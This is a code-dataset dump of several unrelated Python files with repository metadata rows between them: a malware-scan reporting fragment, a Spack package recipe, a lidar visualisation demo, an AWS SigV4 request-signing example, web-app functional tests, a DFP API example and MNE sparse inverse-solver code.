            no_of_files_is_0 = True
            for mal_file in self.mal_files.keys():
                if self.mal_files[mal_file] in self.high_threat_ext:
                    print(mal_file)
                    no_of_files_is_0 = False
                    crit_files[mal_file] = self.mal_files[mal_file]
            if no_of_files_is_0:
                print('No Critical Files found')
                return
            else:
                detected, undetected, unsupported, total, report_id = self.dev_runner(files_dict=crit_files)
        # Assemble one row per scanned file for the report table.
        mal_file_dict = {}
        for mal_file in total.keys():
            mal_file_dict[mal_file] = [detected[mal_file],
                                       undetected[mal_file],
                                       unsupported[mal_file],
                                       total[mal_file],
                                       report_id[mal_file]]
        if self.gui:
            for filename in mal_file_dict:
                globals.mal_file_dict[filename] = mal_file_dict[filename]
                # print(globals.WARNING + 'globals.mal_file_dict' + globals.END)
        # print(globals.WARNING + str(globals.mal_file_dict) + globals.END)
        # Round-trip through JSON to normalise quoting before tabulating.
        mal_file_dict = str(mal_file_dict)
        mal_file_dict = mal_file_dict.replace('\'', '\"')
        mal_file_dict = json.loads(mal_file_dict)
        mal_df = pandas.DataFrame(mal_file_dict)
        mal_df = mal_df.transpose()
        mal_df.columns = ['Detected', 'Undetected', 'Unsupported', 'Total', 'Report ID']
        print(globals.WHITE + mal_df.to_string() + globals.END)
| 42.481618
| 120
| 0.522285
|
4a15aca110d1386c17ecd4e918e3a7cc7b95640e
| 629
|
py
|
Python
|
var/spack/repos/builtin/packages/py-rarfile/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/py-rarfile/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8
|
2021-11-09T20:28:40.000Z
|
2022-03-15T03:26:33.000Z
|
var/spack/repos/builtin/packages/py-rarfile/package.py
|
jeanbez/spack
|
f4e51ce8f366c85bf5aa0eafe078677b42dae1ba
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2019-02-08T20:37:20.000Z
|
2019-03-31T15:19:26.000Z
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class PyRarfile(PythonPackage):
    """RAR archive reader for Python."""

    homepage = "https://github.com/markokr/rarfile"
    pypi = "rarfile/rarfile-4.0.tar.gz"

    version('4.0', sha256='67548769229c5bda0827c1663dce3f54644f9dbfba4ae86d4da2b2afd3e602a1')

    depends_on('python@3.6:', type=('build', 'run'))
    depends_on('py-setuptools', type='build')
    # Run-time-only dependency on the unrar tool.
    depends_on('unrar', type='run')
| 31.45
| 93
| 0.717011
|
4a15ad0b5cd32442e4060a587fe04dc261a8448a
| 4,518
|
py
|
Python
|
viz/demo.py
|
Guoxs/DODT
|
f354cda6ef08465018fdeec1a8b4be4002e6a71f
|
[
"MIT"
] | 1
|
2021-09-01T00:34:17.000Z
|
2021-09-01T00:34:17.000Z
|
viz/demo.py
|
Guoxs/DODT
|
f354cda6ef08465018fdeec1a8b4be4002e6a71f
|
[
"MIT"
] | null | null | null |
viz/demo.py
|
Guoxs/DODT
|
f354cda6ef08465018fdeec1a8b4be4002e6a71f
|
[
"MIT"
] | null | null | null |
import sys
import cv2
import numpy as np
import mayavi.mlab as mlab
import moviepy.editor as mpy
sys.path.append('/home/mooyu/Project/avod/')
sys.path.append('/home/mooyu/Project/avod/wavedata')
import avod
import avod.builders.config_builder_util as config_builder
from avod.builders.dataset_builder import DatasetBuilder
from viz.viz_utils import draw_gt_boxes3d
from wavedata.tools.core import calib_utils
from wavedata.tools.obj_detection import tracking_utils
from wavedata.tools.obj_detection.obj_utils import compute_box_corners_3d
def build_dataset(dataset_config):
    """Build a KITTI tracking dataset on the 'val' split, with labels and
    augmentation disabled (evaluation/visualisation mode)."""
    # Overwrite the defaults
    dataset_config = config_builder.proto_to_obj(dataset_config)
    dataset_config.data_split = 'val'
    dataset_config.data_split_dir = 'training'
    dataset_config.has_labels = False
    # Remove augmentation during evaluation in test mode
    dataset_config.aug_list = []
    # Build the dataset object
    dataset = DatasetBuilder.build_kitti_tracking_dataset(dataset_config,
                                                          use_defaults=False)
    return dataset
def label_convert(labels, calib):
    """Convert ground-truth boxes to (N, 8, 3) corner arrays plus object ids.

    Corners are projected from the rectified camera frame to the velodyne
    frame, then the columns are reordered x, z, y -> x, y, z.
    """
    num_boxes = len(labels)
    corners_3ds = np.zeros((num_boxes, 8, 3), dtype=np.float32)
    box_id = []
    for idx, gt_box in enumerate(labels):
        corners_rect = compute_box_corners_3d(gt_box).T
        corners_velo = calib.project_rect_to_velo(corners_rect)
        # x, z, y ==> x, y, z
        corners_3ds[idx] = corners_velo[:, [0, 2, 1]]
        box_id.append(gt_box.object_id)
    return corners_3ds, box_id
def get_all_data(dataset, video_id):
    """Load point clouds, GT corner boxes, box ids, and RGB images for every
    frame of one tracking video, padding clouds to a common length."""
    name_list = dataset.get_video_frames(video_id)
    point_clouds = []
    obj_labels = []
    boxes_id = []
    images = []
    calib = calib_utils.read_tracking_calibration(dataset.calib_dir, video_id)
    for name in name_list:
        point_cloud = dataset.kitti_utils.get_raw_point_cloud(dataset.bev_source, name)
        # cv2 loads BGR; [..., ::-1] flips channels to RGB.
        image = cv2.imread(dataset.get_rgb_image_path(name))[..., ::-1]
        obj_label = tracking_utils.read_labels(dataset.label_dir, name)
        obj_label = dataset.kitti_utils.filter_labels(obj_label)
        obj_label, box_id = label_convert(obj_label, calib)
        point_clouds.append(point_cloud)
        images.append(image)
        obj_labels.append(obj_label)
        boxes_id.append(box_id)
    # point cloud align
    # Zero-pad each cloud to the largest frame so all frames share one shape
    # (needed so the animation can reuse a single mayavi source).
    max_len = max([pcl.shape[1] for pcl in point_clouds])
    for i in range(len(point_clouds)):
        l = point_clouds[i].shape[1]
        point_clouds[i] = np.pad(point_clouds[i], ((0, 0), (0, max_len - l)),
                                 mode='constant', constant_values=0)
    # labels align
    return point_clouds, obj_labels, boxes_id, images
@mlab.animate(delay=100)
def anim(point_clouds, labels, boxes_id, plt):
    # Mayavi animation generator: cycle through the frames forever, updating
    # the existing points3d source in place and re-rendering each step.
    fig = mlab.gcf()
    while True:
        for (pcl, label, ids) in zip(point_clouds, labels, boxes_id):
            print('Updating scene...')
            # draw_gt_boxes3d(label, fig, box_id=ids)
            plt.mlab_source.set(x=pcl[0], y=pcl[1], z=pcl[2], f=pcl[3])
            fig.scene.render()
            yield
# --- Script entry: animate one KITTI tracking sequence in Mayavi ---
config_name = 'pyramid_cars_with_aug_dt_5_tracking_test'

# Read the config from the config folder
experiment_config_path = avod.root_dir() + '/configs/' + \
    config_name + '.config'

model_config, _, eval_config, dataset_config = \
    config_builder.get_configs_from_pipeline_file(
        experiment_config_path, is_training=False)

# change datasets dir to local (machine-specific path)
dataset_config.dataset_dir = '/media/mooyu/Guoxs_Data/Datasets/' \
                             '3D_Object_Tracking_Evaluation_2012'

video_id = 4
dataset = build_dataset(dataset_config)
point_clouds, labels, boxes_id, images = get_all_data(dataset, video_id)

fig = mlab.figure(figure=None, bgcolor=(0, 0, 0), fgcolor=None, engine=None, size=(1600, 1000))

# draw lidar: first frame's rows feed x/y/z and the color scalar
# (presumably intensity -- TODO confirm channel layout)
plt = mlab.points3d(point_clouds[0][0],
                    point_clouds[0][1],
                    point_clouds[0][2],
                    point_clouds[0][3],
                    color=None,
                    mode='point',
                    colormap='gnuplot',
                    scale_factor=1,
                    figure=fig)
# draw boxes3d
# draw_gt_boxes3d(labels[0], fig, box_id=boxes_id[0])

# draw origin marker
mlab.points3d(0, 0, 0, color=(1, 1, 1), mode='sphere', scale_factor=0.05)

# Start the frame-update generator, then fix the camera and show.
anim(point_clouds, labels, boxes_id, plt)

mlab.view(azimuth=180, elevation=70, focalpoint=[12.0909996, -1.04700089, -2.03249991],
          distance=62.0, figure=fig)

mlab.show()
| 35.023256
| 95
| 0.664675
|
4a15adeee8067a2817ddaaa14508d536651f2b56
| 7,127
|
py
|
Python
|
python/example_code/signv4/v4-signing-get-post.py
|
AkhmadRiswanda/aws-doc-sdk-examples
|
46dbd6e1002f4d5c056df3eb478c318501782a17
|
[
"Apache-2.0"
] | null | null | null |
python/example_code/signv4/v4-signing-get-post.py
|
AkhmadRiswanda/aws-doc-sdk-examples
|
46dbd6e1002f4d5c056df3eb478c318501782a17
|
[
"Apache-2.0"
] | null | null | null |
python/example_code/signv4/v4-signing-get-post.py
|
AkhmadRiswanda/aws-doc-sdk-examples
|
46dbd6e1002f4d5c056df3eb478c318501782a17
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# This file is licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# AWS Version 4 signing example
# DynamoDB API (CreateTable)
# See: http://docs.aws.amazon.com/general/latest/gr/sigv4_signing.html
# This version makes a POST request and passes request parameters
# in the body (payload) of the request. Auth information is passed in
# an Authorization header.
import sys, os, base64, datetime, hashlib, hmac
import requests # pip install requests
# ************* REQUEST VALUES *************
method = 'POST'
service = 'dynamodb'
host = 'dynamodb.us-west-2.amazonaws.com'
region = 'us-west-2'
endpoint = 'https://dynamodb.us-west-2.amazonaws.com/'
# POST requests use a content type header. For DynamoDB,
# the content is JSON.
content_type = 'application/x-amz-json-1.0'
# DynamoDB requires an x-amz-target header that has this format:
#     DynamoDB_<API version>.<operationName>
amz_target = 'DynamoDB_20120810.CreateTable'

# Request parameters for CreateTable--passed in a JSON block.
# (Built by string concatenation to keep the byte sequence that gets
# hashed/signed explicit.)
request_parameters = '{'
request_parameters += '"KeySchema": [{"KeyType": "HASH","AttributeName": "Id"}],'
request_parameters += '"TableName": "TestTable","AttributeDefinitions": [{"AttributeName": "Id","AttributeType": "S"}],'
request_parameters += '"ProvisionedThroughput": {"WriteCapacityUnits": 5,"ReadCapacityUnits": 5}'
request_parameters += '}'
# Key derivation functions. See:
# http://docs.aws.amazon.com/general/latest/gr/signature-v4-examples.html#signature-v4-examples-python
def sign(key, msg):
    """Return the HMAC-SHA256 digest of msg (UTF-8 text) keyed by key (bytes)."""
    mac = hmac.new(key, msg.encode('utf-8'), hashlib.sha256)
    return mac.digest()


def getSignatureKey(key, date_stamp, regionName, serviceName):
    """Derive the SigV4 signing key.

    Chains HMAC-SHA256 over the secret key, the date stamp, the region,
    the service name and the literal 'aws4_request'; each step keys the
    next with the previous digest.
    """
    key_date = sign(('AWS4' + key).encode('utf-8'), date_stamp)
    key_region = sign(key_date, regionName)
    key_service = sign(key_region, serviceName)
    return sign(key_service, 'aws4_request')
# Read AWS access key from env. variables or configuration file. Best practice is NOT
# to embed credentials in code.
access_key = os.environ.get('AWS_ACCESS_KEY_ID')
secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
if access_key is None or secret_key is None:
    print('No access key is available.')
    sys.exit()

# Create a date for headers and the credential string
t = datetime.datetime.utcnow()
amz_date = t.strftime('%Y%m%dT%H%M%SZ')
date_stamp = t.strftime('%Y%m%d')  # Date w/o time, used in credential scope

# ************* TASK 1: CREATE A CANONICAL REQUEST *************
# http://docs.aws.amazon.com/general/latest/gr/sigv4-create-canonical-request.html

# Step 1 is to define the verb (GET, POST, etc.)--already done.

# Step 2: Create canonical URI--the part of the URI from domain to query
# string (use '/' if no path)
canonical_uri = '/'

## Step 3: Create the canonical query string. In this example, request
# parameters are passed in the body of the request and the query string
# is blank.
canonical_querystring = ''

# Step 4: Create the canonical headers. Header names must be trimmed
# and lowercase, and sorted in code point order from low to high.
# Note that there is a trailing \n.
canonical_headers = 'content-type:' + content_type + '\n' + 'host:' + host + '\n' + 'x-amz-date:' + amz_date + '\n' + 'x-amz-target:' + amz_target + '\n'

# Step 5: Create the list of signed headers. This lists the headers
# in the canonical_headers list, delimited with ";" and in alpha order.
# Note: The request can include any headers; canonical_headers and
# signed_headers include those that you want to be included in the
# hash of the request. "Host" and "x-amz-date" are always required.
# For DynamoDB, content-type and x-amz-target are also required.
signed_headers = 'content-type;host;x-amz-date;x-amz-target'

# Step 6: Create payload hash. In this example, the payload (body of
# the request) contains the request parameters.
payload_hash = hashlib.sha256(request_parameters.encode('utf-8')).hexdigest()

# Step 7: Combine elements to create canonical request
canonical_request = method + '\n' + canonical_uri + '\n' + canonical_querystring + '\n' + canonical_headers + '\n' + signed_headers + '\n' + payload_hash

# ************* TASK 2: CREATE THE STRING TO SIGN*************
# Match the algorithm to the hashing algorithm you use, either SHA-1 or
# SHA-256 (recommended)
algorithm = 'AWS4-HMAC-SHA256'
credential_scope = date_stamp + '/' + region + '/' + service + '/' + 'aws4_request'
string_to_sign = algorithm + '\n' + amz_date + '\n' + credential_scope + '\n' + hashlib.sha256(canonical_request.encode('utf-8')).hexdigest()

# ************* TASK 3: CALCULATE THE SIGNATURE *************
# Create the signing key using the function defined above.
signing_key = getSignatureKey(secret_key, date_stamp, region, service)

# Sign the string_to_sign using the signing_key
signature = hmac.new(signing_key, (string_to_sign).encode('utf-8'), hashlib.sha256).hexdigest()

# ************* TASK 4: ADD SIGNING INFORMATION TO THE REQUEST *************
# Put the signature information in a header named Authorization.
authorization_header = algorithm + ' ' + 'Credential=' + access_key + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature

# For DynamoDB, the request can include any headers, but MUST include "host", "x-amz-date",
# "x-amz-target", "content-type", and "Authorization". Except for the authorization
# header, the headers must be included in the canonical_headers and signed_headers values, as
# noted earlier. Order here is not significant.
# # Python note: The 'host' header is added automatically by the Python 'requests' library.
headers = {'Content-Type':content_type,
           'X-Amz-Date':amz_date,
           'X-Amz-Target':amz_target,
           'Authorization':authorization_header}

# ************* SEND THE REQUEST *************
print('\nBEGIN REQUEST++++++++++++++++++++++++++++++++++++')
print('Request URL = ' + endpoint)

r = requests.post(endpoint, data=request_parameters, headers=headers)

print('\nRESPONSE++++++++++++++++++++++++++++++++++++')
print('Response code: %d\n' % r.status_code)
print(r.text)
#snippet-sourcedescription:[v4-signing-get-post shows how to make a request using the Amazon DynamoDB API. The request makes a POST request, passes the request parameters in the body, and passes authentication information to AWS using the Authorization header.]
#snippet-keyword:[Python]
#snippet-keyword:[Code Sample]
#snippet-service:[AWS Signature Version 4 Signing Process]
#snippet-sourcetype:[full-example]
#snippet-sourcedate:[2018-09-20]
#snippet-sourceauthor:[AWS]
| 46.279221
| 219
| 0.695945
|
4a15ae1b75dba57c048ba9f34a5a1aed3945e9be
| 5,954
|
py
|
Python
|
web/magmaweb/tests/test_functional.py
|
NLeSC/MAGMa
|
c48fd1b09785d08f3259bc7b25934eb9d16b5790
|
[
"Apache-2.0"
] | 14
|
2015-08-13T17:29:23.000Z
|
2021-09-02T14:00:15.000Z
|
web/magmaweb/tests/test_functional.py
|
NLeSC/MAGMa
|
c48fd1b09785d08f3259bc7b25934eb9d16b5790
|
[
"Apache-2.0"
] | 11
|
2015-05-12T13:54:23.000Z
|
2019-06-28T20:39:11.000Z
|
web/magmaweb/tests/test_functional.py
|
NLeSC/MAGMa
|
c48fd1b09785d08f3259bc7b25934eb9d16b5790
|
[
"Apache-2.0"
] | 6
|
2016-04-14T11:14:28.000Z
|
2019-11-15T01:12:59.000Z
|
import tempfile
import unittest
import transaction
import json
from nose.plugins.attrib import attr
from webtest import TestApp
from magmaweb import main
from magmaweb.user import DBSession, User
from magmaweb.job import make_job_factory
from magmaweb.tests.test_job import populateTestingDB
@attr('functional')
class FunctionalTests(unittest.TestCase):
    """Base class for functional tests.

    Boots the full magmaweb WSGI app with a temporary job root directory
    and an in-memory SQLite database; subclasses override ``settings`` to
    tweak the app configuration.
    """

    # Per-subclass overrides merged on top of the defaults in setUp().
    settings = {}

    def setUp(self):
        self.root_dir = tempfile.mkdtemp()
        # default settings
        settings = {'jobfactory.root_dir': self.root_dir,
                    'mako.directories': 'magmaweb:templates',
                    'extjsroot': 'ext',
                    'sqlalchemy.url': 'sqlite:///:memory:',
                    'cookie.secret': 'aepeeV6aizaiph5Ae0Reimeequuluwoh',
                    'cookie.path': '/',
                    'monitor_user': 'jobmanager',
                    }
        settings.update(self.settings)
        self.settings = settings
        app = main({}, **self.settings)
        self.testapp = TestApp(app)

    def tearDown(self):
        import shutil
        # Drop the temp job dir, the test app and the scoped DB session.
        shutil.rmtree(self.root_dir)
        del self.testapp
        DBSession.remove()
class FunctionalPrivateTests(FunctionalTests):
    """Functional tests that run as an authenticated job owner ('bob')."""

    def setUp(self):
        FunctionalTests.setUp(self)
        # Setup owner of job
        jf = make_job_factory(self.settings)
        with transaction.manager:
            user = User('bob', 'Bob Example',
                        'bob@example.com', 'mypassword')
            DBSession().add(user)
            self.job = jf.fromScratch('bob')
            self.jobid = self.job.id

    def do_login(self):
        # Authenticate via the login form as the job owner.
        params = {'userid': 'bob', 'password': 'mypassword'}
        self.testapp.post('/login', params)

    def fake_jobid(self):
        """ Create job in self.root_dir filled with test db"""
        with transaction.manager:
            populateTestingDB(self.job.db.session)
        return self.jobid

    def test_home(self):
        self.do_login()
        res = self.testapp.get('/', status=200)
        self.assertTrue(b'Submit' in res.body)

    def test_molecules(self):
        # Full round-trip check of the molecules JSON endpoint against the
        # fixture data inserted by populateTestingDB.
        self.do_login()
        jobid = self.fake_jobid()
        res_url = '/results/' + str(jobid)
        res_url += '/molecules.json?limit=10&start=0'
        res = self.testapp.get(res_url, status=200)
        url1 = '<a href="http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi'
        url1 += '?cid=289">CID: 289</a>'
        url2 = '<a href="http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi'
        url2 += '?cid=152432">CID: 152432</a>'
        self.assertEqual(json.loads(res.body), {
            'totalUnfiltered': 2,
            'total': 2,
            'scans': [{
                'rt': 933.317,
                'id': 641
            }, {
                'rt': 1254.15,
                'id': 870
            }],
            'rows': [{
                'molid': 72,
                'predicted': False,
                'mol': 'Molfile',
                'formula': 'C6H6O2',
                'nhits': 1,
                'name': 'pyrocatechol',
                'refscore': 1.0,
                'reactionsequence': {
                    'reactantof': {
                        'esterase': {
                            'nr': 2,
                            'nrp': 1
                        }
                    }
                },
                'smiles': 'C1=CC=C(C(=C1)O)O',
                'inchikey14': 'YCIMNLLNPGFGHC',
                'mim': 110.03677, 'logp': 1.231,
                'assigned': False,
                'reference': url1
            }, {
                'predicted': False, 'molid': 352,
                'mol': "Molfile of dihydroxyphenyl-valerolactone",
                'formula': "C11H12O4",
                'nhits': 1,
                'name': "dihydroxyphenyl-valerolactone",
                'refscore': 1.0,
                'reactionsequence': {
                    'productof': {
                        'theogallin': {
                            'nr': 1,
                            'nrp': 0
                        }
                    }
                },
                'smiles': "O=C1CCC(Cc2ccc(O)c(O)c2)O1",
                'inchikey14': 'ZNXXWTPQHVLMQT',
                'mim': 208.07355, 'logp': 2.763,
                'assigned': False,
                'reference': url2
            }]
        })

    def test_double_update_job(self):
        """Double update should not raise
        OperationalError: database is locked"""
        self.do_login()
        jobid = self.fake_jobid()
        req_url = '/results/' + str(jobid)
        req_body = json.dumps({"id": "bar",
                               "description": "New description",
                               "ms_filename": "F6789.mzxml",
                               "created_at": "1999-12-17T13:45:04",
                               "is_public": False,
                               })
        self.testapp.put(req_url, req_body)
        req_body2 = json.dumps({"id": "bar",
                                "description": "New description 2",
                                "ms_filename": "F6789.mzxml 2",
                                "created_at": "1999-12-17T13:45:04",
                                "is_public": False,
                                })
        # Second PUT against the same job must also succeed.
        self.testapp.put(req_url, req_body2)
class FunctionalPublicTests(FunctionalTests):
    """Functional tests with automatic registration enabled."""

    settings = {'auto_register': True}

    def test_home(self):
        # Visiting / redirects to /login, which auto-registers/logs in the
        # anonymous visitor and redirects back to /.
        redirect = self.testapp.get('/', status=302)
        page = redirect.follow(status=200)
        self.assertTrue(b'Submit' in page.body)
| 36.304878
| 77
| 0.4565
|
4a15ae1bad6d4fb79db47d7f61d42cf28c6ad872
| 1,625
|
py
|
Python
|
examples/adspygoogle/dfp/v201208/get_all_placements.py
|
krux/adspygoogle
|
6505a71122f45fe3e675f27f2c29f67a1768069b
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
examples/adspygoogle/dfp/v201208/get_all_placements.py
|
krux/adspygoogle
|
6505a71122f45fe3e675f27f2c29f67a1768069b
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
examples/adspygoogle/dfp/v201208/get_all_placements.py
|
krux/adspygoogle
|
6505a71122f45fe3e675f27f2c29f67a1768069b
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 2
|
2020-04-02T19:00:31.000Z
|
2020-08-06T03:28:38.000Z
|
#!/usr/bin/python
#
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all placements. To create placements, run
create_placement.py."""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'

# NOTE: this is a Python 2 example (uses print statements).

# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))

# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.dfp import DfpUtils

# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))

# Initialize appropriate service.
placement_service = client.GetService('PlacementService', version='v201208')

# Get placements by statement (pages through all results).
placements = DfpUtils.GetAllEntitiesByStatementWithService(placement_service)

# Display results.
for placement in placements:
  print ('Placement with id \'%s\' and name \'%s\' was found.'
         % (placement['id'], placement['name']))

print
print 'Number of results found: %s' % len(placements)
| 33.163265
| 80
| 0.736
|
4a15aef9a09d6133c229ad389452ee8e6f3fe7bc
| 27,518
|
py
|
Python
|
mne/inverse_sparse/mxne_inverse.py
|
jnvandermeer/mne-python
|
143a1fbfd2a68a0ce8d700da9299564de0b92334
|
[
"BSD-3-Clause"
] | null | null | null |
mne/inverse_sparse/mxne_inverse.py
|
jnvandermeer/mne-python
|
143a1fbfd2a68a0ce8d700da9299564de0b92334
|
[
"BSD-3-Clause"
] | null | null | null |
mne/inverse_sparse/mxne_inverse.py
|
jnvandermeer/mne-python
|
143a1fbfd2a68a0ce8d700da9299564de0b92334
|
[
"BSD-3-Clause"
] | null | null | null |
# Author: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Daniel Strohmeier <daniel.strohmeier@gmail.com>
#
# License: Simplified BSD
import numpy as np
from scipy import linalg, signal
from ..source_estimate import (SourceEstimate, VolSourceEstimate,
_BaseSourceEstimate)
from ..minimum_norm.inverse import (combine_xyz, _prepare_forward,
_check_reference, _check_loose_forward)
from ..forward import (compute_orient_prior, is_fixed_orient,
convert_forward_solution)
from ..io.pick import pick_channels_evoked
from ..io.proj import deactivate_proj
from ..utils import logger, verbose
from ..dipole import Dipole
from ..externals.six.moves import xrange as range
from .mxne_optim import (mixed_norm_solver, iterative_mixed_norm_solver, _Phi,
norm_l2inf, tf_mixed_norm_solver, norm_epsilon_inf)
@verbose
def _prepare_weights(forward, gain, source_weighting, weights, weights_min):
    """Apply user-supplied source weights to the gain matrix.

    Parameters
    ----------
    weights : array | SourceEstimate
        If a SourceEstimate, its max |amplitude| over time per source is
        used. Normalized by its maximum before use.
    weights_min : float | None
        Threshold (relative to the max weight after normalization) below
        which sources are dropped. If None, no sources are dropped and the
        returned ``mask`` is None.

    Returns
    -------
    gain, source_weighting, mask
    """
    mask = None
    if isinstance(weights, _BaseSourceEstimate):
        weights = np.max(np.abs(weights.data), axis=1)
    weights_max = np.max(weights)
    # BUGFIX: weights_min defaults to None in the public API; the previous
    # code compared/divided None unconditionally, which raises on Python 3.
    if weights_min is not None:
        if weights_min > weights_max:
            raise ValueError('weights_min > weights_max (%s > %s)' %
                             (weights_min, weights_max))
        weights_min = weights_min / weights_max
    weights = weights / weights_max
    n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
    # Replicate one weight per source location across its orientations.
    weights = np.ravel(np.tile(weights, [n_dip_per_pos, 1]).T)
    if len(weights) != gain.shape[1]:
        raise ValueError('weights do not have the correct dimension '
                         ' (%d != %d)' % (len(weights), gain.shape[1]))
    if len(source_weighting.shape) == 1:
        source_weighting *= weights
    else:
        source_weighting *= weights[:, None]
    gain *= weights[None, :]

    if weights_min is not None:
        # Drop columns whose normalized weight is below the threshold.
        mask = (weights > weights_min)
        gain = gain[:, mask]
        n_sources = np.sum(mask) // n_dip_per_pos
        logger.info("Reducing source space to %d sources" % n_sources)

    return gain, source_weighting, mask
@verbose
def _prepare_gain_column(forward, info, noise_cov, pca, depth, loose, weights,
                         weights_min, verbose=None):
    """Whiten the lead field and apply depth / orientation / user weighting.

    Returns (gain, gain_info, whitener, source_weighting, mask); ``mask``
    is None unless user weights with ``weights_min`` pruned sources.
    """
    gain_info, gain, _, whitener, _ = _prepare_forward(forward, info,
                                                       noise_cov, pca)
    logger.info('Whitening lead field matrix.')
    gain = np.dot(whitener, gain)

    is_fixed_ori = is_fixed_orient(forward)
    if depth is not None:
        # Depth prior from the squared column norms of the whitened gain,
        # summed over the 3 orientations for free-orientation forwards.
        depth_prior = np.sum(gain ** 2, axis=0)
        if not is_fixed_ori:
            depth_prior = depth_prior.reshape(-1, 3).sum(axis=1)
        # Spherical leadfield can be zero at the center
        depth_prior[depth_prior == 0.] = np.min(
            depth_prior[depth_prior != 0.])
        depth_prior **= depth
        if not is_fixed_ori:
            depth_prior = np.repeat(depth_prior, 3)
        source_weighting = np.sqrt(1. / depth_prior)
    else:
        source_weighting = np.ones(gain.shape[1], dtype=gain.dtype)

    assert (is_fixed_ori or (0 <= loose <= 1))
    if loose is not None and loose < 1.:
        # Loose orientation prior down-weights tangential components.
        source_weighting *= np.sqrt(compute_orient_prior(forward, loose))

    gain *= source_weighting[None, :]

    if weights is None:
        mask = None
    else:
        gain, source_weighting, mask = _prepare_weights(forward, gain,
                                                        source_weighting,
                                                        weights, weights_min)

    return gain, gain_info, whitener, source_weighting, mask
def _prepare_gain(forward, info, noise_cov, pca, depth, loose, weights,
weights_min, verbose=None):
if not isinstance(depth, float):
raise ValueError('Invalid depth parameter. '
'A float is required (got %s).'
% type(depth))
elif depth < 0.0:
raise ValueError('Depth parameter must be positive (got %s).'
% depth)
gain, gain_info, whitener, source_weighting, mask = \
_prepare_gain_column(forward, info, noise_cov, pca, depth,
loose, weights, weights_min)
return gain, gain_info, whitener, source_weighting, mask
def _reapply_source_weighting(X, source_weighting, active_set):
X *= source_weighting[active_set][:, None]
return X
def _compute_residual(forward, evoked, X, active_set, info):
    """Return evoked minus the sensor field explained by the active sources."""
    # OK, picking based on row_names is safe
    sel = [forward['sol']['row_names'].index(c) for c in info['ch_names']]
    residual = evoked.copy()
    residual = pick_channels_evoked(residual, include=info['ch_names'])
    r_tmp = residual.copy()

    # Forward-project the estimated sources back to sensor space.
    r_tmp.data = np.dot(forward['sol']['data'][sel, :][:, active_set], X)

    # Take care of proj: split projections into applied vs pending.
    active_projs = list()
    non_active_projs = list()
    for p in evoked.info['projs']:
        if p['active']:
            active_projs.append(p)
        else:
            non_active_projs.append(p)

    if len(active_projs) > 0:
        # Apply the already-applied projections to the modeled data too, so
        # the subtraction below compares like with like.
        r_tmp.info['projs'] = deactivate_proj(active_projs, copy=True)
        r_tmp.apply_proj()
        r_tmp.add_proj(non_active_projs, remove_existing=False)

    residual.data -= r_tmp.data

    return residual
@verbose
def _make_sparse_stc(X, active_set, forward, tmin, tstep,
                     active_is_idx=False, verbose=None):
    """Wrap sparse-solver output X into a SourceEstimate / VolSourceEstimate.

    ``active_set`` is either a boolean mask over gain columns or, when
    ``active_is_idx`` is True, an array of column indices.
    """
    if not is_fixed_orient(forward):
        logger.info('combining the current components...')
        # Free orientation: collapse the 3 components per location to one.
        X = combine_xyz(X)

    if not active_is_idx:
        active_idx = np.where(active_set)[0]
    else:
        active_idx = active_set

    n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
    if n_dip_per_pos > 1:
        # Map column indices to source-location indices.
        active_idx = np.unique(active_idx // n_dip_per_pos)

    src = forward['src']

    if src.kind != 'surface':
        # Volume/discrete source space: one flat vertex array.
        vertices = src[0]['vertno'][active_idx]
        stc = VolSourceEstimate(X, vertices=vertices, tmin=tmin, tstep=tstep)
    else:
        # Surface source space: split active indices per hemisphere, using
        # the running vertex offset of each source space.
        vertices = []
        n_points_so_far = 0
        for this_src in src:
            this_n_points_so_far = n_points_so_far + len(this_src['vertno'])
            this_active_idx = active_idx[(n_points_so_far <= active_idx) &
                                         (active_idx < this_n_points_so_far)]
            this_active_idx -= n_points_so_far
            this_vertno = this_src['vertno'][this_active_idx]
            n_points_so_far = this_n_points_so_far
            vertices.append(this_vertno)
        stc = SourceEstimate(X, vertices=vertices, tmin=tmin, tstep=tstep)

    return stc
@verbose
def _make_dipoles_sparse(X, active_set, forward, tmin, tstep, M, M_est,
                         active_is_idx=False, verbose=None):
    """Convert sparse-solver output into a list of Dipole objects.

